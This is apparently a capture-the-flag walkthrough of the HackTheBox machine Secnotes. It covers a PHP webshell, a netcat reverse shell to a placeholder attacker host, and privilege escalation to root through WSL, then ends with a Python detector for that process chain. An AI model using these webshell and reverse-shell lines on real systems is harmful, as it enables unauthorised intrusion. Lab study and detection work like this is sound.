Windows Privilege Escalation - WSL
WSL (Windows Subsystem for Linux) may give us an opportunity to escalate privileges on Windows.
Here is one example from HTB: the machine is Secnotes.
After finding a simple SQL injection and getting the SMB credentials of a user, we connect with smbclient.
Looking through the shares, we find one that lets us put files. I tried putting a simple text file.
When I request the URL on port 8808:
http://10.10.10.97:8808/test.txt
I get the contents of the file.
Next I try putting a PHP webshell:
<?php
// runs whatever is passed in the cmd query parameter as a system command
system($_GET['cmd']);
?>
I uploaded this file as test.php and went to the URL:
http://IPADDRESS/shell.php?cmd=whoami
Bingooo!
I have run PHP code. Now I try to upload a reverse shell:
- locate nc.exe
- cp <nc.exe with FULL PATH> nc.exe
- Go back to the smbclient session and run: put nc.exe
<?php
// nc.exe was uploaded next to this script; it connects back to the attacker and hands it cmd.exe
system('nc.exe -e cmd.exe ATTACKER_IP PORT');
?>
- Create the script above, name it shell.php and go to the URL:
http://10.10.10.97:8808/shell.php
We get the shell.
Let's move on to the WSL part.
where /R C:\Windows wsl.exe
wsl.exe whoami
Yes, commands run through WSL start with root privileges.
Then, with bash.exe, let's get a PTY shell:
python -c 'import pty; pty.spawn("/bin/sh")'
With the history command, we find credentials. After getting these SMB credentials we can use psexec.
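As an added example for this writeup (not code from the original post or from HTB), here is a small Python detector for the process chain this walkthrough produces on the target: a web-server worker spawning cmd.exe and nc.exe, which in turn launches wsl.exe or bash.exe. The sample process-creation events, their field names and PIDs, and the list of web-server images are constructed assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real logs;
# the web-server images, field names and PIDs are assumptions for this example.
SAMPLE_EVENTS = """\
ProcessId=412 ParentProcessId=4 Image=C:\\Windows\\System32\\services.exe CommandLine="services.exe"
ProcessId=2140 ParentProcessId=412 Image=C:\\Windows\\System32\\inetsrv\\w3wp.exe CommandLine="w3wp.exe -ap DefaultAppPool"
ProcessId=2211 ParentProcessId=2140 Image=C:\\php\\php-cgi.exe CommandLine="php-cgi.exe"
ProcessId=2316 ParentProcessId=2211 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c nc.exe -e cmd.exe ATTACKER_IP PORT"
ProcessId=2350 ParentProcessId=2316 Image=C:\\inetpub\\wwwroot\\nc.exe CommandLine="nc.exe -e cmd.exe ATTACKER_IP PORT"
ProcessId=2388 ParentProcessId=2350 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe"
ProcessId=2402 ParentProcessId=2388 Image=C:\\Windows\\System32\\wsl.exe CommandLine="wsl.exe whoami"
ProcessId=3010 ParentProcessId=880 Image=C:\\Windows\\explorer.exe CommandLine="explorer.exe"
ProcessId=3055 ParentProcessId=3010 Image=C:\\Windows\\System32\\wsl.exe CommandLine="wsl.exe"
"""

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe", "nginx.exe"}  # assumed web-server processes
WSL_LAUNCHERS = {"wsl.exe", "bash.exe"}  # both enter the WSL distro, as root by default
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value or key="value with spaces"

def parse_events(text):
    """Map ProcessId -> field dict for every event line."""
    events = {}
    for line in text.splitlines():
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        if "ProcessId" in fields:
            events[int(fields["ProcessId"])] = fields
    return events

def ancestry(events, pid):
    """Image basenames from pid up to the root, following ParentProcessId links."""
    chain, seen = [], set()
    while pid in events and pid not in seen:  # 'seen' guards against PID-reuse loops
        seen.add(pid)
        chain.append(events[pid]["Image"].rsplit("\\", 1)[-1].lower())
        pid = int(events[pid]["ParentProcessId"])
    return chain

def find_wsl_from_webshell(text):
    """Return (pid, chain) for each wsl.exe/bash.exe whose ancestors include a web worker."""
    events = parse_events(text)
    hits = []
    for pid in events:
        chain = ancestry(events, pid)
        if chain[0] in WSL_LAUNCHERS and any(img in WEB_WORKERS for img in chain[1:]):
            hits.append((pid, chain))
    return hits
```

The interactive wsl.exe started from explorer.exe is left alone; only the launch whose parent chain leads back to the web-server worker is flagged.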